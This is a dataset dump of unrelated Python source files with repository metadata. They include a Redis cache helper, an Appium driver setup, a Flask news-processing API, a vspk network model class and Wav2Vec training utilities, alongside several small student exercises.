] | permissive | Jaymon/caches | 7d61bed61ef8d3dc8a328ee037c14a4fc994e98f | 3e2aa5fcf51e8de80bea46eb117b73fb1f398e53 | refs/heads/master | 2023-07-20T23:13:55.461196 | 2023-07-12T20:33:49 | 2023-07-12T20:33:49 | 12,884,773 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,162 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, division, print_function, absolute_import
import logging
from caches.compat import *
from caches.core import (
Cache,
DictCache,
SetCache,
SortedSetCache,
SentinelCache,
)
from .interface import get_interfaces, get_interface, set_interface
from .dsn import configure, configure_environ
from .decorators import cached
__version__ = '3.0.0'
logger = logging.getLogger(__name__)
def unsafe_clear(pattern):
"""Clear the keys matching pattern
This uses scan to find keys matching pattern (eg, foo*) and delets them one
at a time
https://github.com/redis/redis/issues/2042
https://stackoverflow.com/a/4006575/5006
:param pattern: str, something like foo* or *bar*
:returns: int, how many keys were deleted
"""
count = 0
for connection_name, inter in get_interfaces().items():
# https://redis.io/commands/scan
# https://stackoverflow.com/a/34166690/5006
for key in inter.scan_iter(match=pattern, count=500):
inter.delete(String(key))
count += 1
return count
configure_environ()
| [
"[email protected]"
] | |
5edeb038cd1f87c8aac071184fd2fef2036abf0b | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/cs61a/untarred backup/122.py | 887a81dc01674a92d8b5e6f55aff075abf43e9b7 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 1,076 | py | def num_common_letters(goal_word, guess):
"""Returns the number of letters in goal_word that are also in guess.
As per the rules of the game, goal_word cannot have any repeated
letters, but guess is allowed to have repeated letters.
goal_word and guess are assumed to be of the same length.
goal_word and guess are both instances of the word ADT.
>>> mwfs, mwfl = make_word_from_string, make_word_from_list
>>> num_common_letters(mwfs('steal'), mwfs('least'))
5
>>> num_common_letters(mwfs('steal'), mwfl(['s', 't', 'e', 'e', 'l']))
4
>>> num_common_letters(mwfl(['s', 't', 'e', 'a', 'l']), mwfs('thief'))
2
>>> num_common_letters(mwfl(['c', 'a', 'r']), mwfl(['p', 'e', 't']))
0
"""
goal_letters = get_list(goal_word)
guess_letters = get_list(guess)
common = 0
for guess_letter in guess_letters:
if guess_letter in goal_letters:
common += 1
goal_letters = [letter for letter in goal_letters if letter != guess_letter]
return common
| [
"[email protected]"
] | |
cea269f71a06be2e88bab6c122be7e5ec8d08c22 | 8a6c1d9ff5f469774ca4651d46f212474b3435bf | /base/base_driver.py | 8d5ef05be8b058f89c05bfb1479b57f4c18c3888 | [] | no_license | yuanyue888666/test_jinkens_001 | 67a68378dc518e3033a4563f0530adeb530a8646 | b553d0348d967cdb6e25c7d1a46746b75f6d9512 | refs/heads/master | 2020-04-27T15:46:15.202764 | 2019-03-08T03:42:47 | 2019-03-08T03:42:47 | 174,459,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 657 | py |
from appium import webdriver
def init_driver():
"""
只要调用,就可以打开对应的应用程序
:return:
"""
# server 启动参数
desired_caps = {}
# 设备信息
desired_caps['platformName'] = 'Android'
desired_caps['platformVersion'] = '5.1'
desired_caps['deviceName'] = '192.168.56.101:5555'
# app的信息
desired_caps['appPackage'] = 'com.android.contacts'
desired_caps['appActivity'] = '.activities.PeopleActivity'
# 不要重置应用
desired_caps['noReset'] = True
# 声明我们的driver对象
return webdriver.Remote('http://127.0.0.1:4723/wd/hub', desired_caps)
| [
"[email protected]"
] | |
9808dd7f6cb3c4f34d801fa34e4fda3e2717b5d7 | a15b050e661c31880acc72465421f3ba4906ef06 | /0x06-python-classes/101-square.py | ffd6008dce8087b7476ce7b4b8aa8ac3e838cdf3 | [] | no_license | zacwoll/holbertonschool-higher_level_programming | 0c483195f50a55fe0bfae5cff03c0c86719d8063 | 9c7dda67dc5681fd96b90d6f05ee9748a37ed8b8 | refs/heads/master | 2022-12-22T04:54:13.815410 | 2020-09-25T16:03:41 | 2020-09-25T16:03:41 | 259,412,215 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,844 | py | #!/usr/bin/python3
"""Represent a Square Object with a __repr__ toString"""
class Square:
"""A Square"""
def __init__(self, size=0, position=(0, 0)):
"""Init"""
self.__size = size
self.__position = position
def __repr__(self):
"""Square toString"""
to_str = ''
if self.__size == 0:
to_str += '\n'
else:
to_str += ('\n' * self.__position[1])
for i in range(self.__size):
to_str += (' ' * self.__position[0])
to_str += ('#' * self.__size + '\n')
return to_str[:-1]
@property
def size(self):
"""gets the value of size"""
return self.__size
@size.setter
def size(self, value):
"""sets the value of size"""
if type(value) != int:
raise TypeError("size must be an integer")
if value < 0:
raise ValueError("size must be >= 0")
self.__size = value
def area(self):
"""Area of Square"""
return self.__size ** 2
@property
def position(self):
"""gets the value of position"""
return self.__position
@position.setter
def position(self, value):
"""Sets the value of position"""
if type(value) != tuple or len(value) != 2 or \
not all(type(x) == int and x >= 0 for x in a):
raise TypeError('position must be a \
tuple of 2 positive integers')
self.__position = value
def my_print(self):
"""Print the square."""
if self.__size == 0:
print()
else:
print('\n' * self.__position[1], end='')
for i in range(self.__size):
print(' ' * self.__position[0], end='')
print('#' * self.__size)
| [
"[email protected]"
] | |
4c19051a43c291779e8c00d44bd6b787249af569 | 20b2d61c0959023cb51be92fafe54877aecb9887 | /pabi_utils/models/ir_attachment.py | 574f5bb0a1d036cefea059529c50c697e945ffb3 | [] | no_license | BTCTON/pb2_addons | 6841a23554054f859b0c4acafb4e91bd0c3a14e4 | a5bfd90c202cea894690c96d74a74fa96eb79468 | refs/heads/master | 2021-09-07T16:55:41.195667 | 2018-02-26T11:27:01 | 2018-02-26T11:27:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,864 | py | # -*- coding: utf-8 -*-
import logging
import os
from openerp import models, fields, api
_logger = logging.getLogger(__name__)
class IrAttachment(models.Model):
_inherit = 'ir.attachment'
@api.model
def name_search(self, name, args=None, operator='ilike', limit=80):
if self._context.get('domain_template_ids', False):
args += [('id', 'in', self._context['domain_template_ids'][0][2])]
return super(IrAttachment, self).name_search(name=name, args=args,
operator=operator,
limit=limit)
# @api.model
# def load_xlsx_template(self, addon, template_ids, file_dir):
# print addon
# print template_ids
# print file_dir
# for xml_id in template_ids:
# try:
# xmlid = '%s.%s' % (addon, xml_id)
# att = self.env.ref(xmlid)
# file_path = '%s/%s' % (file_dir, att.datas_fname)
# att.datas = open(file_path, 'rb').read().encode('base64')
# except ValueError, e:
# _logger.exception(e.message)
@api.model
def load_xlsx_template(self, att_ids, folder):
for att in self.browse(att_ids):
try:
file_dir = os.path.dirname(os.path.realpath(__file__))
# While can't find better solution, we get the addon dir by
# so, make sure that the calling addon in in the same foloer
# with this pabi_utils
file_dir = file_dir.replace('/pabi_utils/models', '')
file_path = '%s/%s/%s' % (file_dir, folder, att.datas_fname)
att.datas = open(file_path, 'rb').read().encode('base64')
except ValueError, e:
_logger.exception(e.message)
| [
"[email protected]"
] | |
485e5433667081aaf4dc508002d827c07367437d | 6bc485e593a24354e8ec6ad1284809c5748b7995 | /workon/contrib/admin2/templatetags/workon_admin_forms.py | 5e50c0aa768171d3c1ca93e280ff13d4969dbcbe | [
"BSD-3-Clause"
] | permissive | dalou/django-workon | fba87b6951540d7f059c8fcb79cd556573f56907 | ef63c0a81c00ef560ed693e435cf3825f5170126 | refs/heads/master | 2021-01-20T11:09:49.314839 | 2018-12-29T16:56:08 | 2018-12-29T16:56:08 | 50,340,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,936 | py | from django import template
from ..config import get_config
register = template.Library()
def get_form_size(fieldset):
default_label_class = get_config('form_size').split(':')
# Try fieldset definition at first
size_by_fieldset = get_fieldset_size(fieldset)
if size_by_fieldset:
return size_by_fieldset
# Fallback to model admin definition
ma_sizes = getattr(fieldset.model_admin, 'workon_admin_form_size', None)
if ma_sizes:
return ma_sizes.split(':')
# Use default values at last
return default_label_class
def get_fieldset_size(fieldset):
if fieldset and fieldset.classes and ':' in fieldset.classes:
for cls in fieldset.classes.split(' '):
if ':' in cls:
return cls.split(':')
@register.filter
def workon_admin_form_label_class(field, fieldset):
default_class = get_form_size(fieldset)[0]
if not hasattr(field, 'field'):
return default_class
label_class = field.field.widget.attrs.get('label_class')
if label_class:
return label_class
return default_class
@register.filter
def workon_admin_form_field_class(field, fieldset):
"""
Return classes for form-column
"""
css_classes = []
default_class = get_form_size(fieldset)[1]
css_classes.append('form-column')
if not hasattr(field.field, 'field'):
css_classes.append(default_class)
return ' '.join(css_classes)
widget_py_cls = field.field.field.widget.__class__.__name__
css_classes.append('widget-%s' % widget_py_cls)
if 'RawIdWidget' in widget_py_cls:
css_classes.append('form-inline')
class_by_widget = field.field.field.widget.attrs.get('column_class')
if class_by_widget:
del field.field.field.widget.attrs['column_class']
css_classes.append(class_by_widget)
else:
css_classes.append(default_class)
return ' '.join(css_classes)
| [
"[email protected]"
] | |
f95b3ee3fe611007015802c0361cebe21cdbccd6 | 2b398353f5b0529ac666ef180e9dc966474a70c0 | /vspk/v6/nulink.py | 7802d9c7190be35e9f30fde7416b604ce123d54f | [
"BSD-3-Clause"
] | permissive | nuagenetworks/vspk-python | e0c4570be81da2a4d8946299cb44eaf9559e0170 | 9a44d3015aa6424d0154c8c8a42297669cce11f9 | refs/heads/master | 2023-06-01T01:12:47.011489 | 2023-05-12T19:48:52 | 2023-05-12T19:48:52 | 53,171,411 | 21 | 18 | BSD-3-Clause | 2020-12-16T12:36:58 | 2016-03-04T23:10:58 | Python | UTF-8 | Python | false | false | 19,510 | py | # -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from .fetchers import NUDemarcationServicesFetcher
from .fetchers import NUPermissionsFetcher
from .fetchers import NUMetadatasFetcher
from .fetchers import NUNextHopsFetcher
from .fetchers import NUGlobalMetadatasFetcher
from .fetchers import NUPolicyStatementsFetcher
from .fetchers import NUCSNATPoolsFetcher
from .fetchers import NUPSNATPoolsFetcher
from .fetchers import NUOverlayAddressPoolsFetcher
from bambou import NURESTObject
class NULink(NURESTObject):
""" Represents a Link in the VSD
Notes:
Border router links provide a way to interconnect VNS domains in the wide-area to datacenter domains. Service chaining links allow domain leaking in order to simplify and enhance capabilities of doing service chaining and traffic steering for NFV and service-provider-grade VPN services.
"""
__rest_name__ = "link"
__resource_name__ = "links"
## Constants
CONST_ASSOCIATED_DESTINATION_TYPE_DOMAIN = "DOMAIN"
CONST_TYPE_BORDER_ROUTER = "BORDER_ROUTER"
CONST_TYPE_SERVICE_CHAINING = "SERVICE_CHAINING"
CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
CONST_TYPE_OVERLAY_ADDRESS_TRANSLATION = "OVERLAY_ADDRESS_TRANSLATION"
CONST_ACCEPTANCE_CRITERIA_SUBNETS_ONLY = "SUBNETS_ONLY"
CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
CONST_ACCEPTANCE_CRITERIA_ALL = "ALL"
CONST_TYPE_BIDIR = "BIDIR"
CONST_TYPE_HUB_AND_SPOKE = "HUB_AND_SPOKE"
def __init__(self, **kwargs):
""" Initializes a Link instance
Notes:
You can specify all parameters while calling this methods.
A special argument named `data` will enable you to load the
object from a Python dictionary
Examples:
>>> link = NULink(id=u'xxxx-xxx-xxx-xxx', name=u'Link')
>>> link = NULink(data=my_dict)
"""
super(NULink, self).__init__()
# Read/Write Attributes
self._last_updated_by = None
self._last_updated_date = None
self._acceptance_criteria = None
self._read_only = None
self._embedded_metadata = None
self._entity_scope = None
self._creation_date = None
self._associated_destination_id = None
self._associated_destination_name = None
self._associated_destination_type = None
self._associated_source_id = None
self._associated_source_name = None
self._associated_source_type = None
self._owner = None
self._external_id = None
self._type = None
self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="acceptance_criteria", remote_name="acceptanceCriteria", attribute_type=str, is_required=False, is_unique=False, choices=[u'ALL', u'SUBNETS_ONLY'])
self.expose_attribute(local_name="read_only", remote_name="readOnly", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="associated_destination_id", remote_name="associatedDestinationID", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="associated_destination_name", remote_name="associatedDestinationName", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="associated_destination_type", remote_name="associatedDestinationType", attribute_type=str, is_required=False, is_unique=False, choices=[u'DOMAIN'])
self.expose_attribute(local_name="associated_source_id", remote_name="associatedSourceID", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="associated_source_name", remote_name="associatedSourceName", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="associated_source_type", remote_name="associatedSourceType", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
self.expose_attribute(local_name="type", remote_name="type", attribute_type=str, is_required=False, is_unique=False, choices=[u'BIDIR', u'BORDER_ROUTER', u'HUB_AND_SPOKE', u'OVERLAY_ADDRESS_TRANSLATION', u'SERVICE_CHAINING'])
# Fetchers
self.demarcation_services = NUDemarcationServicesFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.next_hops = NUNextHopsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.policy_statements = NUPolicyStatementsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.csnat_pools = NUCSNATPoolsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.psnat_pools = NUPSNATPoolsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.overlay_address_pools = NUOverlayAddressPoolsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self._compute_args(**kwargs)
# Properties
@property
def last_updated_by(self):
""" Get last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
return self._last_updated_by
@last_updated_by.setter
def last_updated_by(self, value):
""" Set last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
self._last_updated_by = value
@property
def last_updated_date(self):
""" Get last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
return self._last_updated_date
@last_updated_date.setter
def last_updated_date(self, value):
""" Set last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
self._last_updated_date = value
@property
def acceptance_criteria(self):
""" Get acceptance_criteria value.
Notes:
A route filtering criteria enum. Defaults to ALL.
This attribute is named `acceptanceCriteria` in VSD API.
"""
return self._acceptance_criteria
@acceptance_criteria.setter
def acceptance_criteria(self, value):
""" Set acceptance_criteria value.
Notes:
A route filtering criteria enum. Defaults to ALL.
This attribute is named `acceptanceCriteria` in VSD API.
"""
self._acceptance_criteria = value
@property
def read_only(self):
""" Get read_only value.
Notes:
This is set to true if a link has been created in the opposite direction
This attribute is named `readOnly` in VSD API.
"""
return self._read_only
@read_only.setter
def read_only(self, value):
""" Set read_only value.
Notes:
This is set to true if a link has been created in the opposite direction
This attribute is named `readOnly` in VSD API.
"""
self._read_only = value
@property
def embedded_metadata(self):
""" Get embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.
This attribute is named `embeddedMetadata` in VSD API.
"""
return self._embedded_metadata
@embedded_metadata.setter
def embedded_metadata(self, value):
""" Set embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.
This attribute is named `embeddedMetadata` in VSD API.
"""
self._embedded_metadata = value
@property
def entity_scope(self):
""" Get entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
return self._entity_scope
@entity_scope.setter
def entity_scope(self, value):
""" Set entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
self._entity_scope = value
@property
def creation_date(self):
""" Get creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
return self._creation_date
@creation_date.setter
def creation_date(self, value):
""" Set creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
self._creation_date = value
@property
def associated_destination_id(self):
""" Get associated_destination_id value.
Notes:
This is the ID of the domain receiving the routes from the source. This can only be set for links of type OVERLAY_ADDRESS_TRANSLATION.
This attribute is named `associatedDestinationID` in VSD API.
"""
return self._associated_destination_id
@associated_destination_id.setter
def associated_destination_id(self, value):
""" Set associated_destination_id value.
Notes:
This is the ID of the domain receiving the routes from the source. This can only be set for links of type OVERLAY_ADDRESS_TRANSLATION.
This attribute is named `associatedDestinationID` in VSD API.
"""
self._associated_destination_id = value
@property
def associated_destination_name(self):
""" Get associated_destination_name value.
Notes:
None
This attribute is named `associatedDestinationName` in VSD API.
"""
return self._associated_destination_name
@associated_destination_name.setter
def associated_destination_name(self, value):
""" Set associated_destination_name value.
Notes:
None
This attribute is named `associatedDestinationName` in VSD API.
"""
self._associated_destination_name = value
@property
def associated_destination_type(self):
""" Get associated_destination_type value.
Notes:
Type of the entity type for the source
This attribute is named `associatedDestinationType` in VSD API.
"""
return self._associated_destination_type
@associated_destination_type.setter
def associated_destination_type(self, value):
""" Set associated_destination_type value.
Notes:
Type of the entity type for the source
This attribute is named `associatedDestinationType` in VSD API.
"""
self._associated_destination_type = value
@property
def associated_source_id(self):
""" Get associated_source_id value.
Notes:
The ID of the domain receiving the routes from another domain
This attribute is named `associatedSourceID` in VSD API.
"""
return self._associated_source_id
@associated_source_id.setter
def associated_source_id(self, value):
""" Set associated_source_id value.
Notes:
The ID of the domain receiving the routes from another domain
This attribute is named `associatedSourceID` in VSD API.
"""
self._associated_source_id = value
@property
def associated_source_name(self):
""" Get associated_source_name value.
Notes:
None
This attribute is named `associatedSourceName` in VSD API.
"""
return self._associated_source_name
@associated_source_name.setter
def associated_source_name(self, value):
""" Set associated_source_name value.
Notes:
None
This attribute is named `associatedSourceName` in VSD API.
"""
self._associated_source_name = value
@property
def associated_source_type(self):
""" Get associated_source_type value.
Notes:
This is the source object type for the associatedSourceID
This attribute is named `associatedSourceType` in VSD API.
"""
return self._associated_source_type
@associated_source_type.setter
def associated_source_type(self, value):
""" Set associated_source_type value.
Notes:
This is the source object type for the associatedSourceID
This attribute is named `associatedSourceType` in VSD API.
"""
self._associated_source_type = value
@property
def owner(self):
""" Get owner value.
Notes:
Identifies the user that has created this object.
"""
return self._owner
@owner.setter
def owner(self, value):
""" Set owner value.
Notes:
Identifies the user that has created this object.
"""
self._owner = value
@property
def external_id(self):
""" Get external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
return self._external_id
@external_id.setter
def external_id(self, value):
""" Set external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
self._external_id = value
@property
def type(self):
""" Get type value.
Notes:
This is used to distinguish between different type of links: hub and spoke, IP address, VNS border router links.
"""
return self._type
@type.setter
def type(self, value):
""" Set type value.
Notes:
This is used to distinguish between different type of links: hub and spoke, IP address, VNS border router links.
"""
self._type = value
| [
"[email protected]"
] | |
e7fe710c9c2d6ebda3fbd6abeb440116a6fe2d4b | 90c6262664d013d47e9a3a9194aa7a366d1cabc4 | /tests/storage/cases/test_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM.py | 4057d7a5c0281d83115c8389161a41dd451ce6df | [
"MIT"
] | permissive | tqtezos/pytezos | 3942fdab7aa7851e9ea81350fa360180229ec082 | a4ac0b022d35d4c9f3062609d8ce09d584b5faa8 | refs/heads/master | 2021-07-10T12:24:24.069256 | 2020-04-04T12:46:24 | 2020-04-04T12:46:24 | 227,664,211 | 1 | 0 | MIT | 2020-12-30T16:44:56 | 2019-12-12T17:47:53 | Python | UTF-8 | Python | false | false | 1,130 | py | from unittest import TestCase
from tests import get_data
from pytezos.michelson.converter import build_schema, decode_micheline, encode_micheline, micheline_to_michelson
class StorageTestKT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(TestCase):
@classmethod
def setUpClass(cls):
cls.maxDiff = None
cls.contract = get_data('storage/zeronet/KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM.json')
def test_storage_encoding_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(self):
type_expr = self.contract['script']['code'][1]
val_expr = self.contract['script']['storage']
schema = build_schema(type_expr)
decoded = decode_micheline(val_expr, type_expr, schema)
actual = encode_micheline(decoded, schema)
self.assertEqual(val_expr, actual)
def test_storage_schema_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(self):
_ = build_schema(self.contract['script']['code'][0])
def test_storage_format_KT1EyeTPvtVgJHhrUaVSNQo75AKQZSGwu9aM(self):
_ = micheline_to_michelson(self.contract['script']['code'])
_ = micheline_to_michelson(self.contract['script']['storage'])
| [
"[email protected]"
] | |
6f50d5f2a0f722718cb1480dd3c12c423f57a9ac | 5f13ce6fb06d86f99ddcc0d8aa16cc4817ec4b03 | /api.py | 9c029c70498dce7666c1bcb59689c55d50bada12 | [] | no_license | news-ai/news-processing | 1b59f17c24da9f48d35c09db64c98fca18471bb6 | 1b874e186f8b9d8510dd3b47a672a7c08f98e082 | refs/heads/master | 2021-03-19T16:42:57.783382 | 2016-06-11T18:26:31 | 2016-06-11T18:26:31 | 58,774,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,493 | py | # Stdlib imports
import logging
# Third-party app imports
from flask import Flask, request, jsonify
from flask.ext.cors import CORS
from flask_restful import Resource, Api, reqparse
from raven.contrib.flask import Sentry
# Imports from app
from middleware.config import (
SENTRY_USER,
SENTRY_PASSWORD,
SENTRY_APP_ID,
)
from processing.process_article import process_article
from taskrunner import app as celery_app
# Setting up Flask and API
app = Flask(__name__)
api = Api(app)
CORS(app)
# Setting up Sentry
sentry = Sentry(
app, dsn='https://' + SENTRY_USER + ':' + SENTRY_PASSWORD + '@app.getsentry.com/' + SENTRY_APP_ID)
logger = logging.getLogger("sentry.errors")
handler = logging.StreamHandler()
formatter = logging.Formatter("[%(levelname)s] %(name)s: %(message)s")
handler.setFormatter(formatter)
logger.addHandler(handler)
# Setting up parser
parser = reqparse.RequestParser()
parser.add_argument('url')
parser.add_argument('added_by')
parser.add_argument('rss_id')
# Route to POST data for news processing
class Processing(Resource):
def post(self):
args = parser.parse_args()
if 'added_by' in args and args['added_by'] is not None:
return process_article(args)
res = celery_app.send_task(
'processing.process_article.process_article', ([args]))
return jsonify({'id': res.task_id})
api.add_resource(Processing, '/processing')
if __name__ == '__main__':
app.run(port=int('8000'), debug=False)
| [
"[email protected]"
] | |
b4118ccd20e3a44af5e0864ac2e03dd8488f8d35 | a6d62bb9f4cb00fea89ff10e27b516890dc8a49a | /utils/generic_utils.py | 57536f8847a50c7ab234709d48cbf404620729cc | [
"MIT"
] | permissive | WeberJulian/Wav2Vec-Wrapper | dca6be0edd25f67b9a3e2719dc5bee8b0bbdfb4f | 84519cd51a4f3d9cb61de99c5712640f3cf5213d | refs/heads/main | 2023-06-11T15:26:53.754106 | 2021-07-06T17:13:38 | 2021-07-06T17:13:38 | 383,545,362 | 0 | 0 | MIT | 2021-07-06T17:14:03 | 2021-07-06T17:14:03 | null | UTF-8 | Python | false | false | 2,816 | py | import os
import re
import yaml
import json
import torch
import numpy as np
from datasets import load_metric
wer_metric = load_metric("wer")
def calculate_wer(pred_ids, labels, processor, debug=False):
labels[labels == -100] = processor.tokenizer.pad_token_id
pred_string = processor.batch_decode(pred_ids)
label_string = processor.batch_decode(labels, group_tokens=False)
wer = wer_metric.compute(predictions=pred_string, references=label_string)
if debug:
print(" > DEBUG: \n\n PRED:", pred_string, "\n Label:", label_string)
return wer
class AttrDict(dict):
"""A custom dict which converts dict keys
to class attributes"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__dict__ = self
def read_json_with_comments(json_path):
# fallback to json
with open(json_path, "r", encoding="utf-8") as f:
input_str = f.read()
# handle comments
input_str = re.sub(r"\\\n", "", input_str)
input_str = re.sub(r"//.*\n", "\n", input_str)
data = json.loads(input_str)
return data
def load_config(config_path: str) -> AttrDict:
"""Load config files and discard comments
Args:
config_path (str): path to config file.
"""
config = AttrDict()
ext = os.path.splitext(config_path)[1]
if ext in (".yml", ".yaml"):
with open(config_path, "r", encoding="utf-8") as f:
data = yaml.safe_load(f)
else:
data = read_json_with_comments(config_path)
config.update(data)
return config
def load_vocab(voba_path):
config = AttrDict()
config.update(read_json_with_comments(voba_path))
return config
def save_best_checkpoint(log_dir, model, optimizer, lr_scheduler, scaler, step, epoch, val_loss, best_loss, early_epochs=None):
if val_loss < best_loss:
best_loss = val_loss
if early_epochs is not None:
early_epochs = 0
model_save_path = os.path.join(log_dir, 'pytorch_model.bin')
# model.save_pretrained(log_dir) # export model with transformers for save the config too
torch.save(model.state_dict(), model_save_path)
optimizer_save_path = os.path.join(log_dir, 'optimizer.pt')
checkpoint_dict = {
'optimizer': optimizer.state_dict(),
'scheduler': lr_scheduler.state_dict(),
'step': step,
'epoch': epoch
}
if scaler is not None:
checkpoint_dict['scaler'] = scaler.state_dict()
torch.save(checkpoint_dict, optimizer_save_path)
print("\n > BEST MODEL ({0:.5f}) saved at {1:}".format(
val_loss, model_save_path))
else:
if early_epochs is not None:
early_epochs += 1
return best_loss, early_epochs | [
"[email protected]"
] | |
47e279735f840d1e03f6ec23975d5337aa5da6bc | 376e4114a1ef612ae5d0d2a53a74076870562067 | /2017/R1CA/Pancake.py | 91a0621901dc3c2ad74766f7eec04f93645d6b25 | [] | no_license | jacegem/google-codejam-py | 1890e895c56ceb6c4cbcaa4c5cae213f1cb2dd6a | 4e3300021c7f54c339da92afc0974d5076d60499 | refs/heads/master | 2021-06-06T07:45:53.946239 | 2021-04-10T03:30:49 | 2021-04-10T03:30:49 | 89,255,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py |
class Pancake:
def __init__(self, r, h, top, surface):
self.r = r
self.h = h
self.top = top
self.surface = surface
self.used = False
self.top_surface = top + surface
def set_used(self, used):
self.used = used
def is_used(self):
return self.used
def get_top_surace(self):
return self.top_surface
def sort_surface(self):
return self.surface
| [
"[email protected]"
] | |
